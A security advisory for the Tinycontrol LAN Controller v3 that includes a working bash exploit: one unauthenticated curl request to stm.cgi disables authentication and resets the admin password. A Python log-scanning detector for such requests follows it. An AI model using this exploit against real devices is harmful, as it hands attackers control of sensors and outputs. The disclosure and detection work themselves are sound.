Tinycontrol LAN Controller 3 Remote Admin Password Change
Tinycontrol LAN Controller version 3 suffers from an insecure access control vulnerability that allows an unauthenticated attacker to change account passwords and bypass authentication, gaining control-panel access.
#!/bin/bash
#
: "
Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change


Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8

Summary: Lan Controller is a very universal device that allows you
to connect many different sensors and remotely view their readings
and remotely control various types of outputs. It is also possible
to combine both functions into an automatic if -> this with a
calendar when -> then. The device provides a user interface in the
form of a web page. The website presents readings of various types
of sensors: temperature, humidity, pressure, voltage, current. It
also allows you to configure the device, incl. event setting and
controlling up to 10 outputs. Thanks to the support of many
protocols, it is possible to operate from smartphones, collect and
observe the results on the server, as well as cooperation with
other I/O systems based on TCP/IP and Modbus.

Desc: The application suffers from an insecure access control
allowing an unauthenticated attacker to change account passwords
and bypass authentication gaining panel control access.

Tested on: lwIP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5787
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php


18.08.2023

"

set -euo pipefail
IFS=$'\n\t'

if [ $# -ne 2 ]; then
    echo -ne "\nUsage: $0 [ipaddr] [desired admin pwd]\n\n"
    exit 1
fi

IP=$1
PW=$2
EN=$(echo -n "$PW" | base64)   # the new password is sent base64-encoded

# auth=<flags><admin name b64>*<admin pwd b64>*<user name b64>*<user pwd b64>
# YWRtaW4= decodes to "admin", dXNlcg== to "user"
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
curl -s "http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg=="

echo -ne "\nAdmin password changed to: $PW"
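A defender-side detection example, added here and not part of the advisory or of the vendor's code: it scans access-log lines for stm.cgi requests carrying the auth parameter in the format the script above sends, decodes the account-name fields and marks requests sent with the auth=00 flags. It assumes the log lines come from a reverse proxy or IDS sensor in front of the controller (the device itself keeps no such log); the sample lines, the 192.0.2.x addresses and the function names are constructed for this example.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample lines (Combined Log Format), assumed to come from a reverse
# proxy or IDS sensor in front of the controller; the second mirrors the advisory's
# auth format, the third uses a constructed non-"00" flags value.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Aug/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.55 - - [18/Aug/2023:10:00:07 +0000] "GET /stm.cgi?auth=00YWRtaW4=*cGFzc3dvcmQ=*dXNlcg==*dXNlcg== HTTP/1.1" 200 12
192.0.2.10 - - [18/Aug/2023:10:00:09 +0000] "GET /stm.cgi?auth=01YWRtaW4=*c2VjcmV0*dXNlcg==*dXNlcg== HTTP/1.1" 200 12
"""
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d+)')

def _b64_text(field: str) -> Optional[str]:
    """Strict base64 decode of one field; None if it is not base64 text."""
    try:
        return base64.b64decode(field, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def parse_auth_param(query: str) -> Optional[dict]:
    """auth=<2 flag digits><admin name>*<admin pw>*<user name>*<user pw>, base64 fields."""
    for part in query.split("&"):          # no parse_qs: it would mangle '+' and '='
        if part.startswith("auth="):
            value = part[len("auth="):]
            flags, fields = value[:2], value[2:].split("*")
            if not flags.isdigit() or len(fields) != 4:
                return None
            decoded = [_b64_text(f) for f in fields]
            if None in decoded:
                return None
            # Report password lengths only so the alert does not leak them.
            return {"flags": flags, "admin_user": decoded[0], "admin_pw_len": len(decoded[1]),
                    "user_user": decoded[2], "user_pw_len": len(decoded[3])}
    return None

def find_credential_changes(log_text: str) -> list:
    """One record per request that (re)sets controller credentials via stm.cgi."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or urlsplit(m["target"]).path != "/stm.cgi":
            continue
        auth = parse_auth_param(urlsplit(m["target"]).query)
        if auth:
            # "00" is the flags value the advisory gives as disabling authentication.
            hits.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]),
                         "auth_disabled": auth["flags"] == "00", **auth})
    return hits
```

Any hit from a source that is not a known administrator host is worth an alert on its own, since the advisory's point is that the request needs no prior authentication.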